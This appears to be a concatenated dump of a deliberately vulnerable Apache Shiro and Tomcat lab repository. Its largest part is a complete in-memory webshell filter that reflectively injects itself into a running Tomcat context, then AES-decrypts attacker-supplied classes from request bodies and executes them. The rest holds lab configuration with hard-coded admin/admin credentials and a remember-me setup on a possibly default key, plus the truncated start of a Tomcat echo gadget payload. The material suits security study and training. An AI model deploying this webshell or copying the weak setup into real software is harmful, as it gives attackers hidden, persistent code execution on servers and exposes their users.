     * wrapped {@code request} field is expected to expose a {@code response} field, falling back
     * to a {@code getResponse()} method on the request class. Every failure is swallowed, so
     * callers may find {@link #response} still {@code null}.
     */
    public void parseObj(Object obj) {
        if (obj.getClass().isArray()) {
            Object[] data = (Object[])((Object[])obj);
            this.request = (HttpServletRequest)data[0];
            this.response = (HttpServletResponse)data[1];
        } else {
            try {
                Class clazz = Class.forName("javax.servlet.jsp.PageContext");
                this.request = (HttpServletRequest)clazz.getDeclaredMethod("getRequest").invoke(obj);
                this.response = (HttpServletResponse)clazz.getDeclaredMethod("getResponse").invoke(obj);
            } catch (Exception var8) {
                if (obj instanceof HttpServletRequest) {
                    this.request = (HttpServletRequest)obj;

                    try {
                        // Unwraps the facade: request.request.response (field names are Tomcat-specific).
                        Field req = this.request.getClass().getDeclaredField("request");
                        req.setAccessible(true);
                        HttpServletRequest request2 = (HttpServletRequest)req.get(this.request);
                        Field resp = request2.getClass().getDeclaredField("response");
                        resp.setAccessible(true);
                        this.response = (HttpServletResponse)resp.get(request2);
                    } catch (Exception var7) {
                        try {
                            this.response = (HttpServletResponse)this.request.getClass().getDeclaredMethod("getResponse").invoke(obj);
                        } catch (Exception var6) {
                        }
                    }
                }
            }
        }
    }

    /**
     * Registers this object as a filter whose name and URL pattern are both {@link #path}.
     * Tomcat's {@code ApplicationContext.addFilter} rejects registrations once the context has
     * started, which is what the reflective rewind of {@code LifecycleBase.state} to
     * {@code STARTING_PREP} works around; {@code filterStart} is then invoked so the new filter
     * gets a config, and the matching {@code FilterMap} is moved to index 0 of the array returned
     * by {@code findFilterMaps}. On the Tomcat versions this targets that array appears to be the
     * live internal one, which is why the arraycopy back into it takes effect — confirm.
     *
     * @return {@code "Success"}, {@code "Filter already exists"}, or the message of the exception
     *     that aborted registration
     * @throws Exception only from the finally block (see the review note there)
     */
    public String addFilter() throws Exception {
        ServletContext servletContext = this.request.getServletContext();
        Filter filter = this;
        String filterName = this.path;
        String url = this.path;
        if (servletContext.getFilterRegistration(filterName) == null) {
            Field contextField = null;
            ApplicationContext applicationContext = null;
            StandardContext standardContext = null;
            Field stateField = null;
            FilterRegistration.Dynamic filterRegistration = null;

            // Holds the result when the try block does not return normally.
            String var11;
            try {
                // ServletContext facade -> ApplicationContext -> StandardContext, via private "context" fields.
                contextField = servletContext.getClass().getDeclaredField("context");
                contextField.setAccessible(true);
                applicationContext = (ApplicationContext)contextField.get(servletContext);
                contextField = applicationContext.getClass().getDeclaredField("context");
                contextField.setAccessible(true);
                standardContext = (StandardContext)contextField.get(applicationContext);
                stateField = LifecycleBase.class.getDeclaredField("state");
                stateField.setAccessible(true);
                stateField.set(standardContext, LifecycleState.STARTING_PREP);
                filterRegistration = servletContext.addFilter(filterName, filter);
                filterRegistration.addMappingForUrlPatterns(EnumSet.of(DispatcherType.REQUEST), false, new String[]{url});
                Method filterStartMethod = StandardContext.class.getMethod("filterStart");
                filterStartMethod.setAccessible(true);
                filterStartMethod.invoke(standardContext, (Object[])null);
                stateField.set(standardContext, LifecycleState.STARTED);
                var11 = null;

                // FilterMap moved packages between Tomcat major versions; try the newer name first.
                Class filterMap;
                try {
                    filterMap = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap");
                } catch (Exception var23) {
                    filterMap = Class.forName("org.apache.catalina.deploy.FilterMap");
                }

                Method findFilterMaps = standardContext.getClass().getMethod("findFilterMaps");
                Object[] filterMaps = (Object[])((Object[])findFilterMaps.invoke(standardContext));
                Object[] tmpFilterMaps = new Object[filterMaps.length];
                // Slot 0 is reserved for this filter's own map; all others shift by one.
                int index = 1;

                for(int i = 0; i < filterMaps.length; ++i) {
                    Object filterMapObj = filterMaps[i];
                    findFilterMaps = filterMap.getMethod("getFilterName");
                    String name = (String)findFilterMaps.invoke(filterMapObj);
                    if (name.equalsIgnoreCase(filterName)) {
                        tmpFilterMaps[0] = filterMapObj;
                    } else {
                        tmpFilterMaps[index++] = filterMaps[i];
                    }
                }

                System.arraycopy(tmpFilterMaps, 0, filterMaps, 0, filterMaps.length);
                String var27 = "Success";
                return var27;
            } catch (Exception var24) {
                var11 = var24.getMessage();
            } finally {
                // NOTE(review): stateField and standardContext are still null if the reflection
                // above failed early, so this finally can itself throw NullPointerException and
                // mask the original exception.
                stateField.set(standardContext, LifecycleState.STARTED);
            }

            return var11;
        } else {
            return "Filter already exists";
        }
    }

    /**
     * Request handler of the implanted filter. For every request that reaches the mapped path it
     * stores {@link #Pwd} in session attribute {@code "u"}, reads the first line of the body,
     * base64-decodes it, AES-decrypts it with {@link #Pwd} as the raw key (mode 2 is
     * {@code Cipher.DECRYPT_MODE}; the bare {@code "AES"} transformation leaves mode and padding
     * to the provider's defaults), defines the plaintext as a class in a fresh loader, instantiates
     * it and calls {@code equals(ctx)} with a map of request, response and session.
     * Any exception is printed to stderr. {@code chain.doFilter} is never called, so the request
     * never reaches the rest of the chain.
     */
    public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain) throws IOException, ServletException {
        HttpSession session = ((HttpServletRequest)req).getSession();
        Map obj = new HashMap();
        obj.put("request", req);
        obj.put("response", resp);
        obj.put("session", session);

        try {
            session.putValue("u", this.Pwd);
            Cipher c = Cipher.getInstance("AES");
            String dd = req.getReader().readLine();
            c.init(2, new SecretKeySpec(this.Pwd.getBytes(), "AES"));
            // The decrypted bytes are expected to be a class file; the behaviour then lives in
            // that class's equals(Object), not in this one.
            (new MemBehinderFilter(this.getClass().getClassLoader())).g(c.doFinal(this.base64Decode(dd))).newInstance().equals(obj);
        } catch (Exception var7) {
            var7.printStackTrace();
        }

    }

    /**
     * Base64-decodes {@code str}, first via {@code sun.misc.BASE64Decoder} (absent on JDK 9+),
     * then via {@code java.util.Base64}; both are reached reflectively so neither is a
     * compile-time dependency.
     */
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[])((byte[])clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str));
        } catch (Exception var5) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke((Object)null);
            return (byte[])((byte[])decoder.getClass().getMethod("decode", String.class).invoke(decoder, str));
        }
    }

    // Lifecycle callbacks are intentionally empty; all setup happens in addFilter().
    public void init(FilterConfig filterConfig) throws ServletException {
    }

    public void destroy() {
    }
}
224 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/shiro/MainRealm.java:
--------------------------------------------------------------------------------
1 |
2 | package com.shiro.vuln.shiro;
3 |
4 | import org.apache.shiro.authc.*;
5 | import org.apache.shiro.authz.AuthorizationInfo;
6 | import org.apache.shiro.realm.AuthorizingRealm;
7 | import org.apache.shiro.subject.PrincipalCollection;
8 |
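/**
 * Realm for the lab: exactly one fixed account ({@code admin}/{@code admin}) and no
 * authorization data. The credentials are intentionally hard-coded for the exercise.
 */
public class MainRealm extends AuthorizingRealm {

    private static final String LAB_USERNAME = "admin";
    private static final char[] LAB_PASSWORD = "admin".toCharArray();
    private static final String FAILURE_MESSAGE = "Username or password is incorrect.";

    /**
     * Authorization: this lab defines no roles or permissions, so {@code null} is returned
     * (Shiro treats a missing AuthorizationInfo as "no roles, no permissions").
     */
    @Override
    protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) {
        return null;
    }

    /**
     * Authentication: accepts the token only when its principal and credentials match the
     * fixed lab account.
     *
     * @param authenticationToken token whose principal is the username ({@code String}) and
     *     whose credentials are the password ({@code char[]}), e.g. a UsernamePasswordToken
     * @return authentication info for the admin account, tagged with this realm's name
     * @throws IncorrectCredentialsException if the principal or credentials are missing, of an
     *     unexpected type, or wrong. One exception type and one message are used for every
     *     failure so the realm gives no hint about which part was wrong.
     */
    @Override
    protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException {
        // A null or non-String principal previously escaped as NullPointerException /
        // ClassCastException; report it as an ordinary authentication failure instead.
        Object principal = authenticationToken.getPrincipal();
        if (!(principal instanceof String)) {
            throw new IncorrectCredentialsException(FAILURE_MESSAGE);
        }
        String username = (String) principal;

        // Same for the credentials, which arrive as char[] from UsernamePasswordToken.
        Object credentials = authenticationToken.getCredentials();
        if (!(credentials instanceof char[])) {
            throw new IncorrectCredentialsException(FAILURE_MESSAGE);
        }
        char[] password = (char[]) credentials;

        if (username.equals(LAB_USERNAME) && constantTimeEquals(password, LAB_PASSWORD)) {
            // Credentials are stored as a String, as before, so Shiro's default credentials
            // matcher compares them the same way it always has.
            return new SimpleAuthenticationInfo(username, new String(password), this.getName());
        }
        throw new IncorrectCredentialsException(FAILURE_MESSAGE);
    }

    /**
     * Compares two char arrays without stopping at the first mismatching character, so the
     * comparison time does not depend on how much of the password was right. A length
     * mismatch still returns early.
     */
    private static boolean constantTimeEquals(char[] a, char[] b) {
        if (a.length != b.length) {
            return false;
        }
        int diff = 0;
        for (int i = 0; i < a.length; i++) {
            diff |= a[i] ^ b[i];
        }
        return diff == 0;
    }
}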
31 |
32 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/shiro/ShiroConfig.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.shiro;
2 |
3 | import java.util.LinkedHashMap;
4 | import org.apache.shiro.mgt.RememberMeManager;
5 | import org.apache.shiro.mgt.SecurityManager;
6 | import org.apache.shiro.realm.Realm;
7 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
8 | import org.apache.shiro.web.mgt.CookieRememberMeManager;
9 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
10 | import org.springframework.context.annotation.Bean;
11 | import org.springframework.context.annotation.Configuration;
12 |
@Configuration
public class ShiroConfig {

    /** The lab realm with its single fixed account. */
    @Bean
    MainRealm mainRealm() {
        return new MainRealm();
    }

    /**
     * Cookie-based remember-me manager.
     * NOTE(review): no cipher key is configured here, so the key is whatever the Shiro version in
     * use defaults to; whether that default is a fixed, publicly known key depends on the version
     * declared in pom.xml — verify.
     */
    @Bean
    RememberMeManager cookieRememberMeManager() {
        return new CookieRememberMeManager();
    }

    /** Web security manager wired to the realm and the remember-me manager above. */
    @Bean
    SecurityManager securityManager(MainRealm mainRealm, RememberMeManager cookieRememberMeManager) {
        DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
        manager.setRealm(mainRealm);
        manager.setRememberMeManager(cookieRememberMeManager);
        return manager;
    }

    /**
     * Filter chain definitions. The listed paths are anonymous; everything else goes through the
     * {@code user} filter, which is satisfied by a remembered subject (remember-me cookie) as well
     * as a logged-in one — {@code authc} would require an actual login. Shiro picks the first
     * matching definition, so insertion order matters and the catch-all comes last.
     */
    @Bean(name = {"shiroFilter"})
    ShiroFilterFactoryBean shiroFilterFactoryBean(SecurityManager securityManager) {
        ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
        bean.setSecurityManager(securityManager);
        bean.setLoginUrl("/login");
        bean.setUnauthorizedUrl("/unauth");

        LinkedHashMap<String, String> chain = new LinkedHashMap<>();
        String[] anonymousPaths = {"/doLogin", "/json", "/index", "/init", "/getKey", "/setKey", "/ser"};
        for (String anonymousPath : anonymousPaths) {
            chain.put(anonymousPath, "anon");
        }
        chain.put("/**", "user");
        bean.setFilterChainDefinitionMap(chain);
        return bean;
    }
}
54 |
55 |
--------------------------------------------------------------------------------
/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8088
--------------------------------------------------------------------------------
/src/test/java/TomcatEcho.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/safe6Sec/ShiroAndFastJson/df004c21bb3df98eeb3eeec177fdfafc7b12c9be/src/test/java/TomcatEcho.class
--------------------------------------------------------------------------------
/src/test/java/TomcatEcho.java:
--------------------------------------------------------------------------------
1 | /*
2 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
3 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
4 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
5 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
6 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
7 | import org.apache.catalina.connector.Response;
8 | import org.apache.coyote.Request;
9 | import org.apache.coyote.RequestInfo;
10 |
11 | import java.io.InputStream;
12 | import java.io.Writer;
13 | import java.lang.reflect.Field;
14 | import java.util.List;
15 |
16 | public class TomcatEcho extends AbstractTranslet {
17 |
18 | static {
19 | try {
20 | boolean flag = false;
21 | Thread[] threads = (Thread[]) getField(Thread.currentThread().getThreadGroup(),"threads");
22 | for (int i=0;i